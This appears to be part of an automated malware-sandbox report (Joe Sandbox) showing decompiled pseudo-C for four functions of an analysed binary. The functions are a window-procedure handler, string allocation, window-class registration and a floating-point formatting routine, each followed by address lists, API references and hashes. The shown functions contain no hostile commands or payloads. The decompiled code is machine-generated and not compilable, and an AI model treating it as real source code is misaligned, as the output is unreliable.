                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule_fast_error_exit$CommandInfoLineStartupVersion__wincmdln
                                                                              • String ID: 3Z
                                                                              • API String ID: 3897392166-3101245992
                                                                              • Opcode ID: e7de573366e18692071b5f73743a0ee6d0bb9c350bc7485548209224508de0fc
                                                                              • Instruction ID: e39f2213261bf95a39a70617c0542d3cca9913f4f7838575e9a6613787c2c189
                                                                              • Opcode Fuzzy Hash: e7de573366e18692071b5f73743a0ee6d0bb9c350bc7485548209224508de0fc
                                                                              • Instruction Fuzzy Hash: 2941B270D003158ADB25AF75EA056EE36B0BF44719F20442FE415EB292DBBC89D2CB9D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00427382, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 81%
                                                                              			E00427382(void* __ecx, void* __edx) {
				_Unknown_base(*)()* _t33;
				void* _t35;
				void* _t36;
				void* _t41;
				void* _t44;
				long _t54;
				signed int _t59;
				void* _t62;
				void* _t67;
				struct HWND__* _t69;
				CHAR* _t72;
				void* _t75;
				void* _t76;
				void* _t78;

				_t67 = __edx;
				_t62 = __ecx;
				E004128A0(E00430EDB, _t76);
				_t69 =  *(_t76 + 8);
				 *((intOrPtr*)(_t76 - 0x10)) = _t78 - 0x40;
				_t72 = "AfxOldWndProc423";
				_t33 = GetPropA(_t69, _t72);
				 *(_t76 - 0x14) =  *(_t76 - 0x14) & 0x00000000;
				 *(_t76 - 4) =  *(_t76 - 4) & 0x00000000;
				 *(_t76 - 0x18) = _t33;
				_t59 = 1;
				_t35 =  *(_t76 + 0xc) - 6;
				if(_t35 == 0) {
					_t36 = E00426406(_t76,  *(_t76 + 0x14));
					E004272AB(_t62, E00426406(_t76, _t69),  *(_t76 + 0x10), _t36);
					goto L9;
				} else {
					_t41 = _t35 - 0x1a;
					if(_t41 == 0) {
						_t59 = 0 | E0042730C(E00426406(_t76, _t69),  *(_t76 + 0x14),  *(_t76 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t59 != 0) {
							goto L10;
						}
					} else {
						_t44 = _t41 - 0x62;
						if(_t44 == 0) {
							SetWindowLongA(_t69, 0xfffffffc,  *(_t76 - 0x18));
							RemovePropA(_t69, _t72);
							GlobalDeleteAtom(GlobalFindAtomA(_t72));
							goto L10;
						} else {
							if(_t44 != 0x8e) {
								L10:
								 *(_t76 - 0x14) = CallWindowProcA( *(_t76 - 0x18), _t69,  *(_t76 + 0xc),  *(_t76 + 0x10),  *(_t76 + 0x14));
							} else {
								_t75 = E00426406(_t76, _t69);
								E00425A42(_t75, _t76 - 0x30, _t76 - 0x1c);
								_t54 = CallWindowProcA( *(_t76 - 0x18), _t69, 0x110,  *(_t76 + 0x10),  *(_t76 + 0x14));
								_push( *((intOrPtr*)(_t76 - 0x1c)));
								 *(_t76 - 0x14) = _t54;
								_push(_t76 - 0x30);
								_push(_t75);
								E00426952(_t67);
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return  *(_t76 - 0x14);
			}

















                                                                              0x00427382
                                                                              0x00427382
                                                                              0x00427387
                                                                              0x00427392
                                                                              0x00427395
                                                                              0x00427398
                                                                              0x0042739f
                                                                              0x004273a5
                                                                              0x004273a9
                                                                              0x004273ad
                                                                              0x004273b5
                                                                              0x004273b6
                                                                              0x004273b9
                                                                              0x0042746f
                                                                              0x00427481
                                                                              0x00000000
                                                                              0x004273bf
                                                                              0x004273bf
                                                                              0x004273c2
                                                                              0x00427467
                                                                              0x00427486
                                                                              0x00427488
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004273c8
                                                                              0x004273c8
                                                                              0x004273cb
                                                                              0x0042742d
                                                                              0x00427435
                                                                              0x00427443
                                                                              0x00000000
                                                                              0x004273cd
                                                                              0x004273d2
                                                                              0x0042748a
                                                                              0x0042749d
                                                                              0x004273d8
                                                                              0x004273de
                                                                              0x004273e9
                                                                              0x004273fd
                                                                              0x00427403
                                                                              0x00427406
                                                                              0x0042740c
                                                                              0x0042740d
                                                                              0x0042740e
                                                                              0x0042740e
                                                                              0x004273d2
                                                                              0x004273cb
                                                                              0x004273c2
                                                                              0x0042741b
                                                                              0x00427424

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00427387
                                                                              • GetPropA.USER32 ref: 0042739F
                                                                              • CallWindowProcA.USER32 ref: 004273FD
                                                                                • Part of subcall function 00426952: GetWindowRect.USER32 ref: 00426977
                                                                                • Part of subcall function 00426952: GetWindow.USER32(?,00000004), ref: 00426994
                                                                              • SetWindowLongA.USER32 ref: 0042742D
                                                                              • RemovePropA.USER32 ref: 00427435
                                                                              • GlobalFindAtomA.KERNEL32 ref: 0042743C
                                                                              • GlobalDeleteAtom.KERNEL32 ref: 00427443
                                                                                • Part of subcall function 00425A42: GetWindowRect.USER32 ref: 00425A4E
                                                                              • CallWindowProcA.USER32 ref: 00427497
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
                                                                              • String ID: AfxOldWndProc423
                                                                              • API String ID: 2397448395-1060338832
                                                                              • Opcode ID: 5205c125f3a34b7f5717aba14159f4d8c6d4550cd91e21211bbf33beee265512
                                                                              • Instruction ID: 74fd42a34dd2830671bc7576cd9b7697f62222986a732e51f69a364edfc140cf
                                                                              • Opcode Fuzzy Hash: 5205c125f3a34b7f5717aba14159f4d8c6d4550cd91e21211bbf33beee265512
                                                                              • Instruction Fuzzy Hash: EE318132A0012AABCB11AFA5EE49DBF7F78FF05310F40452AF902A2151D77C8911DB69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042F9BF, Relevance: 15.2, APIs: 10, Instructions: 181memorystringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 53%
                                                                              			E0042F9BF(void* __ecx) {
				intOrPtr _t52;
				intOrPtr _t53;
				void* _t57;
				CHAR* _t60;
				CHAR* _t88;
				CHAR* _t89;
				void* _t102;
				CHAR* _t103;
				CHAR* _t105;
				CHAR* _t106;
				CHAR* _t107;
				void* _t111;
				short* _t112;
				void* _t122;
				void* _t127;
				void* _t129;
				void* _t131;

				_t127 = _t129 - 0x8c;
				_t52 =  *0x457184; // 0xc72e1596
				 *((intOrPtr*)(_t127 + 0x88)) = _t52;
				_t53 =  *0x4560dc(_t111, _t122, _t102);
				_t112 =  *((intOrPtr*)(_t127 + 0x94));
				 *((intOrPtr*)(_t127 - 0x7c)) = _t53;
				E00412140(_t112, 0, 0x20);
				_t103 =  *(_t127 + 0x98);
				_t131 = _t129 - 0x10c + 0xc;
				_t109 = _t103;
				 *(_t127 - 0x80) = _t127 - 0x78;
				if(E00428B30(_t103, 0x44b234) == 0) {
					_t109 = _t103;
					_t57 = E00428B30(_t103, 0x449b80);
					_push(0x100);
					_push(_t127 - 0x78);
					if(_t57 == 0) {
						_push(0xf108);
						E00428C25();
						 *_t112 = 0xf108;
						L12:
						_t60 = 0;
						if( *(_t127 - 0x80) == 0) {
							L14:
							__imp__#2(_t60);
							 *(_t112 + 8) = _t60;
							if( *(_t112 + 4) == 0) {
								_t106 =  *(E0042D179() + 0x10);
								if(_t106 != 0) {
									_t115 = lstrlenA(_t106) + 1;
									E00412260(lstrlenA(_t106) + 0x00000001 + lstrlenA(_t106) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
									_t60 = E00408F24(_t131, _t106, _t115,  *((intOrPtr*)(_t127 - 0x7c)));
									_t112 =  *((intOrPtr*)(_t127 + 0x94));
								} else {
									_t60 = 0;
								}
								__imp__#2(_t60);
								 *(_t112 + 4) = _t60;
							}
							if( *(_t112 + 0xc) == 0 &&  *(_t112 + 0x10) != 0) {
								_t105 =  *( *((intOrPtr*)(E0042D179() + 4)) + 0x60);
								if(_t105 != 0) {
									_t126 = lstrlenA(_t105) + 1;
									E00412260(lstrlenA(_t105) + 0x00000001 + lstrlenA(_t105) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
									_t60 = E00408F24(_t131, _t105, _t126,  *((intOrPtr*)(_t127 - 0x7c)));
								} else {
									_t60 = 0;
								}
								__imp__#2(_t60);
								 *(_t112 + 0xc) = _t60;
							}
							return E00412FBB(_t60,  *((intOrPtr*)(_t127 + 0x88)));
						}
						L13:
						_t117 = lstrlenA( *(_t127 - 0x80)) + 1;
						E00412260(lstrlenA( *(_t127 - 0x80)) + 0x00000001 + lstrlenA( *(_t127 - 0x80)) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t60 = E00408F24(_t131,  *(_t127 - 0x80), _t117,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
						goto L14;
					}
					_push(0xf10a);
					E00428C25();
					 *_t112 = 0xf10a;
					goto L13;
				}
				 *(_t127 - 0x80) = _t103[0xc];
				 *_t112 = _t103[8];
				 *(_t112 + 0x10) = _t103[0x10];
				 *(_t112 + 0x1c) = _t103[0x1c];
				_t88 = _t103[0x14];
				 *(_t127 + 0x98) = _t88;
				if( *((intOrPtr*)(_t88 - 0xc)) != 0) {
					if(_t88 != 0) {
						_t121 = lstrlenA(_t88) + 1;
						E00412260(lstrlenA(_t88) + 0x00000001 + lstrlenA(_t88) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t88 = E00408F24(_t131,  *(_t127 + 0x98), _t121,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
					}
					__imp__#2(_t88);
					 *(_t112 + 0xc) = _t88;
				}
				_t107 = _t103[0x18];
				_t89 = 0;
				if( *((intOrPtr*)(_t107 - 0xc)) != 0) {
					if(_t107 != 0) {
						_t119 = lstrlenA(_t107) + 1;
						E00412260(lstrlenA(_t107) + 0x00000001 + lstrlenA(_t107) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t89 = E00408F24(_t131, _t107, _t119,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
					}
					__imp__#2(_t89);
					 *(_t112 + 4) = _t89;
				}
				goto L12;
			}




















                                                                              0x0042f9c0
                                                                              0x0042f9cd
                                                                              0x0042f9d5
                                                                              0x0042f9db
                                                                              0x0042f9e1
                                                                              0x0042f9ec
                                                                              0x0042f9ef
                                                                              0x0042f9f4
                                                                              0x0042f9fa
                                                                              0x0042fa05
                                                                              0x0042fa07
                                                                              0x0042fa17
                                                                              0x0042fac5
                                                                              0x0042fac7
                                                                              0x0042face
                                                                              0x0042fad6
                                                                              0x0042fad7
                                                                              0x0042faea
                                                                              0x0042faef
                                                                              0x0042faf4
                                                                              0x0042faf9
                                                                              0x0042faf9
                                                                              0x0042fafe
                                                                              0x0042fb2b
                                                                              0x0042fb2c
                                                                              0x0042fb36
                                                                              0x0042fb39
                                                                              0x0042fb40
                                                                              0x0042fb45
                                                                              0x0042fb50
                                                                              0x0042fb5a
                                                                              0x0042fb67
                                                                              0x0042fb6c
                                                                              0x0042fb47
                                                                              0x0042fb47
                                                                              0x0042fb47
                                                                              0x0042fb73
                                                                              0x0042fb79
                                                                              0x0042fb79
                                                                              0x0042fb80
                                                                              0x0042fb90
                                                                              0x0042fb95
                                                                              0x0042fba0
                                                                              0x0042fbaa
                                                                              0x0042fbb7
                                                                              0x0042fb97
                                                                              0x0042fb97
                                                                              0x0042fb97
                                                                              0x0042fbbd
                                                                              0x0042fbc3
                                                                              0x0042fbc3
                                                                              0x0042fbe1
                                                                              0x0042fbe1
                                                                              0x0042fb00
                                                                              0x0042fb07
                                                                              0x0042fb11
                                                                              0x0042fb20
                                                                              0x0042fb25
                                                                              0x00000000
                                                                              0x0042fb25
                                                                              0x0042fad9
                                                                              0x0042fade
                                                                              0x0042fae3
                                                                              0x00000000
                                                                              0x0042fae3
                                                                              0x0042fa20
                                                                              0x0042fa27
                                                                              0x0042fa2d
                                                                              0x0042fa33
                                                                              0x0042fa36
                                                                              0x0042fa3d
                                                                              0x0042fa43
                                                                              0x0042fa47
                                                                              0x0042fa4e
                                                                              0x0042fa58
                                                                              0x0042fa6a
                                                                              0x0042fa6f
                                                                              0x0042fa6f
                                                                              0x0042fa76
                                                                              0x0042fa7c
                                                                              0x0042fa7c
                                                                              0x0042fa7f
                                                                              0x0042fa82
                                                                              0x0042fa87
                                                                              0x0042fa8b
                                                                              0x0042fa92
                                                                              0x0042fa9c
                                                                              0x0042faa9
                                                                              0x0042faae
                                                                              0x0042faae
                                                                              0x0042fab5
                                                                              0x0042fabb
                                                                              0x0042fabb
                                                                              0x00000000

                                                                              APIs
                                                                              • lstrlenA.KERNEL32(?,0044B234), ref: 0042FA4A
                                                                                • Part of subcall function 00408F24: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,?,?), ref: 00408F46
                                                                              • SysAllocString.OLEAUT32(?), ref: 0042FA76
                                                                              • lstrlenA.KERNEL32(?,0044B234), ref: 0042FA8E
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042FAB5
                                                                              • lstrlenA.KERNEL32(?,0000F108,?,00000100,00449B80,0044B234), ref: 0042FB03
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042FB2C
                                                                              • lstrlenA.KERNEL32(?), ref: 0042FB4C
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042FB73
                                                                              • lstrlenA.KERNEL32(?), ref: 0042FB9C
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042FBBD
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AllocStringlstrlen$ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 2903237683-0
                                                                              • Opcode ID: 45545eed331dc10e38daf4459cc20624933f7e148aeba7e336886f60cbc21c1e
                                                                              • Instruction ID: 95e2cb44f51d560655b1b672b56ce74a8a5348faf5459b0af81ded966541d2a2
                                                                              • Opcode Fuzzy Hash: 45545eed331dc10e38daf4459cc20624933f7e148aeba7e336886f60cbc21c1e
                                                                              • Instruction Fuzzy Hash: 2051E372A00615ABCB20AFB5DC45B8BBBB8FF08314F50457BE915C7281DB78E954CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00425081, Relevance: 15.1, APIs: 10, Instructions: 81stringregistryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00425081() {
				signed int _t39;
				CHAR* _t43;
				int _t44;
				WNDCLASSA* _t63;
				void* _t71;
				void* _t73;

				E004128A0(E00430E48, _t71);
				_t63 =  *(_t71 + 8);
				 *((intOrPtr*)(_t71 - 0x10)) = _t73 - 0x38;
				if(GetClassInfoA(_t63->hInstance, _t63->lpszClassName, _t71 - 0x40) == 0) {
					if(RegisterClassA(_t63) == 0) {
						L5:
						_t39 = 0;
					} else {
						 *(_t71 - 0x18) = 1;
						if( *((char*)(E0042D179() + 0x14)) == 0) {
							L10:
							_t39 =  *(_t71 - 0x18);
						} else {
							E0042E21A(1);
							 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
							_t43 = E0042D179() + 0x34;
							 *(_t71 - 0x14) = _t43;
							_t44 = lstrlenA(_t43);
							_t13 = lstrlenA(_t63->lpszClassName) + 2; // 0x2
							if(_t44 + _t13 < 0x1000) {
								 *(_t71 + 8) = lstrlenA( *(_t71 - 0x14));
								_t19 = lstrlenA(_t63->lpszClassName) + 2; // 0x6
								if( *(_t71 + 8) + _t19 >= 0x1000) {
									 *(_t71 - 0x18) =  *(_t71 - 0x18) & 0x00000000;
									UnregisterClassA(_t63->lpszClassName, _t63->hInstance);
								} else {
									lstrcatA( *(_t71 - 0x14), _t63->lpszClassName);
									 *(_t71 + 0xa) = 0xa;
									 *((char*)(_t71 + 0xb)) = 0;
									lstrcatA( *(_t71 - 0x14), _t71 + 0xa);
								}
								 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
								E0042E27D(1);
								goto L10;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t39 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
				return _t39;
			}









                                                                              0x00425086
                                                                              0x00425091
                                                                              0x00425094
                                                                              0x004250a9
                                                                              0x004250bd
                                                                              0x00425106
                                                                              0x00425106
                                                                              0x004250bf
                                                                              0x004250c2
                                                                              0x004250ce
                                                                              0x0042515e
                                                                              0x0042515e
                                                                              0x004250d4
                                                                              0x004250d5
                                                                              0x004250da
                                                                              0x004250e9
                                                                              0x004250ed
                                                                              0x004250f0
                                                                              0x004250f9
                                                                              0x00425104
                                                                              0x00425112
                                                                              0x0042511a
                                                                              0x00425120
                                                                              0x00425146
                                                                              0x0042514d
                                                                              0x00425122
                                                                              0x0042512e
                                                                              0x00425137
                                                                              0x0042513b
                                                                              0x0042513f
                                                                              0x0042513f
                                                                              0x00425153
                                                                              0x00425159
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00425104
                                                                              0x004250ce
                                                                              0x004250ab
                                                                              0x004250ad
                                                                              0x004250ad
                                                                              0x00425166
                                                                              0x0042516f

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Classlstrlen$H_prologInfoRegister
                                                                              • String ID:
                                                                              • API String ID: 3690589370-0
                                                                              • Opcode ID: 919b9a9095e4ac863620c4403685a6b6106aeddbfd690dcb7436add64eb4c5a5
                                                                              • Instruction ID: 6f627533603d51bacd891d18b453acc12c50dc985cec7ff47600680533f7a54f
                                                                              • Opcode Fuzzy Hash: 919b9a9095e4ac863620c4403685a6b6106aeddbfd690dcb7436add64eb4c5a5
                                                                              • Instruction Fuzzy Hash: 2931A571E00629EFCF019FA0ED45BAE7FB4FF08354F104566E805A2661C7789A61CBA9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041EA4D, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 228COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 73%
                                                                              			E0041EA4D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed short* _a24) {
				intOrPtr _v8;
				char _v9;
				signed int _v10;
				signed int _v14;
				signed int _v18;
				signed short _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v44;
				signed int _v48;
				signed short* _v52;
				intOrPtr _t87;
				signed int _t88;
				signed short* _t99;
				intOrPtr* _t100;
				signed int _t101;
				signed short _t103;
				signed int _t105;
				signed short* _t131;
				signed int _t133;
				signed int _t139;
				signed short* _t141;
				signed short _t149;
				signed int _t151;
				signed int _t152;
				signed int _t159;
				signed int _t161;
				signed int _t164;
				void* _t165;
				void* _t166;

				_t87 =  *0x457184; // 0xc72e1596
				_v8 = _t87;
				_t88 = _a12;
				_t131 = _a24;
				_t133 = _t88 & 0x00008000;
				_v32 = 0xcc;
				_v31 = 0xcc;
				_v30 = 0xcc;
				_v29 = 0xcc;
				_v28 = 0xcc;
				_v27 = 0xcc;
				_v26 = 0xcc;
				_v25 = 0xcc;
				_v24 = 0xcc;
				_v23 = 0xcc;
				_v22 = 0xfb;
				_v21 = 0x3f;
				_v48 = 1;
				_t149 = _t88 & 0x00007fff;
				if(_t133 == 0) {
					_t131[1] = 0x20;
				} else {
					_t131[1] = 0x2d;
				}
				_t151 = _a8;
				if(_t149 != 0 || _t151 != 0 || _a4 != _t151) {
					if(_t149 != 0x7fff) {
						_t90 = _t149 & 0x0000ffff;
						_v20 = _v20 & 0x00000000;
						_v18 = _a4;
						_t159 = (((_t149 & 0x0000ffff) >> 8) + (_t151 >> 0x18) * 2) * 0x4d + _t90 * 0x4d10 - 0x134312f4 >> 0x10;
						_v10 = _t149;
						_v14 = _t151;
						E0041F41C(_t131, _t151, _t159,  &_v20,  ~_t159, 1);
						_t166 = _t165 + 0xc;
						__eflags = _v10 - 0x3fff;
						if(_v10 >= 0x3fff) {
							_t159 = _t159 + 1;
							__eflags = _t159;
							E0041F1EA(_t131, _t151, _t159,  &_v20,  &_v32);
						}
						__eflags = _a20 & 0x00000001;
						_t152 = _a16;
						 *_t131 = _t159;
						if((_a20 & 0x00000001) == 0) {
							L27:
							__eflags = _t152 - 0x15;
							if(_t152 > 0x15) {
								_t152 = 0x15;
							}
							_t161 = (_v10 & 0x0000ffff) - 0x3ffe;
							_t52 =  &_v10;
							 *_t52 = _v10 & 0x00000000;
							__eflags =  *_t52;
							_a12 = 8;
							do {
								E0041E4E0( &_v20);
								_t56 =  &_a12;
								 *_t56 = _a12 - 1;
								__eflags =  *_t56;
							} while ( *_t56 != 0);
							__eflags = _t161;
							if(_t161 < 0) {
								_t164 =  ~_t161 & 0x000000ff;
								__eflags = _t164;
								if(_t164 > 0) {
									do {
										E0041E50E( &_v20);
										_t164 = _t164 - 1;
										__eflags = _t164;
									} while (_t164 != 0);
								}
							}
							_t59 = _t152 + 1; // 0xcd
							_t139 = _t59;
							__eflags = _t139;
							_t99 =  &(_t131[2]);
							_v52 = _t99;
							if(_t139 > 0) {
								_a12 = _t139;
								do {
									asm("movsd");
									asm("movsd");
									asm("movsd");
									E0041E4E0( &_v20);
									E0041E4E0( &_v20);
									E0041E482(__eflags,  &_v20,  &_v44);
									E0041E4E0( &_v20);
									_t166 = _t166 + 0x14;
									_v52 =  &(_v52[0]);
									_t74 =  &_a12;
									 *_t74 = _a12 - 1;
									__eflags =  *_t74;
									 *_v52 = _v9 + 0x30;
									_v9 = 0;
								} while ( *_t74 != 0);
								_t99 = _v52;
							}
							_t100 = _t99 - 1;
							_t101 = _t100 - 1;
							__eflags =  *_t100 - 0x35;
							_t141 =  &(_t131[2]);
							if( *_t100 < 0x35) {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x30;
									if( *_t101 == 0x30) {
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 >= _t141) {
									goto L46;
								} else {
									 *_t141 = 0x30;
									goto L54;
								}
							} else {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x39;
									if( *_t101 == 0x39) {
										 *_t101 = 0x30;
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 < _t141) {
									_t101 = _t101 + 1;
									 *_t131 =  *_t131 + 1;
									__eflags =  *_t131;
								}
								 *_t101 =  *_t101 + 1;
								__eflags =  *_t101;
								L46:
								_t103 = _t101 - _t131 - 3;
								__eflags = _t103;
								_t131[1] = _t103;
								 *((char*)( &(_t131[2]) + _t103)) = 0;
								goto L47;
							}
						} else {
							_t152 = _t152 + _t159;
							__eflags = _t152;
							if(_t152 > 0) {
								goto L27;
							} else {
								goto L26;
							}
						}
					} else {
						 *_t131 = 1;
						if(_t151 != 0x80000000 || _a4 != 0) {
							if((_t151 & 0x40000000) != 0) {
								goto L11;
							} else {
								_push("1#SNAN");
								goto L21;
							}
						} else {
							L11:
							__eflags = _t133;
							if(_t133 == 0) {
								L15:
								__eflags = _t151 - 0x80000000;
								if(_t151 != 0x80000000) {
									goto L20;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										goto L20;
									} else {
										_push("1#INF");
										goto L18;
									}
								}
							} else {
								__eflags = _t151 - 0xc0000000;
								if(_t151 != 0xc0000000) {
									goto L15;
								} else {
									__eflags = _a4;
									if(_a4 != 0) {
										L20:
										_push("1#QNAN");
										L21:
										_push( &(_t131[2]));
										E00419460();
										_t131[1] = 6;
									} else {
										_push("1#IND");
										L18:
										_push( &(_t131[2]));
										E00419460();
										_t131[1] = 5;
									}
								}
							}
						}
						_v48 = _v48 & 0x00000000;
						L47:
						_t105 = _v48;
					}
				} else {
					L26:
					_t131[2] = 0x30;
					L54:
					 *_t131 =  *_t131 & 0x00000000;
					_t131[1] = 0x20;
					_t131[1] = 1;
					_t131[2] = 0;
					_t105 = 1;
				}
				return E00412FBB(_t105, _v8);
			}











































                                                                              0x0041ea53
                                                                              0x0041ea58
                                                                              0x0041ea5b
                                                                              0x0041ea5f
                                                                              0x0041ea6a
                                                                              0x0041ea76
                                                                              0x0041ea7a
                                                                              0x0041ea7e
                                                                              0x0041ea82
                                                                              0x0041ea86
                                                                              0x0041ea8a
                                                                              0x0041ea8e
                                                                              0x0041ea92
                                                                              0x0041ea96
                                                                              0x0041ea9a
                                                                              0x0041ea9e
                                                                              0x0041eaa2
                                                                              0x0041eaa6
                                                                              0x0041eaad
                                                                              0x0041eaaf
                                                                              0x0041eab7
                                                                              0x0041eab1
                                                                              0x0041eab1
                                                                              0x0041eab1
                                                                              0x0041eabe
                                                                              0x0041eac1
                                                                              0x0041ead3
                                                                              0x0041eb4d
                                                                              0x0041eb58
                                                                              0x0041eb75
                                                                              0x0041eb78
                                                                              0x0041eb87
                                                                              0x0041eb8b
                                                                              0x0041eb8e
                                                                              0x0041eb93
                                                                              0x0041eb96
                                                                              0x0041eb9c
                                                                              0x0041eba6
                                                                              0x0041eba6
                                                                              0x0041eba7
                                                                              0x0041ebad
                                                                              0x0041ebae
                                                                              0x0041ebb2
                                                                              0x0041ebb5
                                                                              0x0041ebb8
                                                                              0x0041ebcc
                                                                              0x0041ebcc
                                                                              0x0041ebcf
                                                                              0x0041ebd3
                                                                              0x0041ebd3
                                                                              0x0041ebd8
                                                                              0x0041ebde
                                                                              0x0041ebde
                                                                              0x0041ebde
                                                                              0x0041ebe3
                                                                              0x0041ebea
                                                                              0x0041ebee
                                                                              0x0041ebf3
                                                                              0x0041ebf3
                                                                              0x0041ebf3
                                                                              0x0041ebf6
                                                                              0x0041ebf9
                                                                              0x0041ebfb
                                                                              0x0041ebff
                                                                              0x0041ebff
                                                                              0x0041ec05
                                                                              0x0041ec07
                                                                              0x0041ec0b
                                                                              0x0041ec10
                                                                              0x0041ec10
                                                                              0x0041ec11
                                                                              0x0041ec07
                                                                              0x0041ec05
                                                                              0x0041ec14
                                                                              0x0041ec14
                                                                              0x0041ec17
                                                                              0x0041ec19
                                                                              0x0041ec1c
                                                                              0x0041ec1f
                                                                              0x0041ec21
                                                                              0x0041ec24
                                                                              0x0041ec2a
                                                                              0x0041ec2b
                                                                              0x0041ec30
                                                                              0x0041ec31
                                                                              0x0041ec3a
                                                                              0x0041ec47
                                                                              0x0041ec50
                                                                              0x0041ec5d
                                                                              0x0041ec60
                                                                              0x0041ec63
                                                                              0x0041ec63
                                                                              0x0041ec63
                                                                              0x0041ec66
                                                                              0x0041ec68
                                                                              0x0041ec68
                                                                              0x0041ec6e
                                                                              0x0041ec6e
                                                                              0x0041ec71
                                                                              0x0041ec74
                                                                              0x0041ec75
                                                                              0x0041ec78
                                                                              0x0041ec7b
                                                                              0x0041ecbb
                                                                              0x0041ecbb
                                                                              0x0041ecbd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041ecb5
                                                                              0x0041ecb8
                                                                              0x0041ecba
                                                                              0x0041ecba
                                                                              0x00000000
                                                                              0x0041ecba
                                                                              0x00000000
                                                                              0x0041ecb8
                                                                              0x0041ecbf
                                                                              0x0041ecc1
                                                                              0x00000000
                                                                              0x0041ecc3
                                                                              0x0041ecc3
                                                                              0x00000000
                                                                              0x0041ecc3
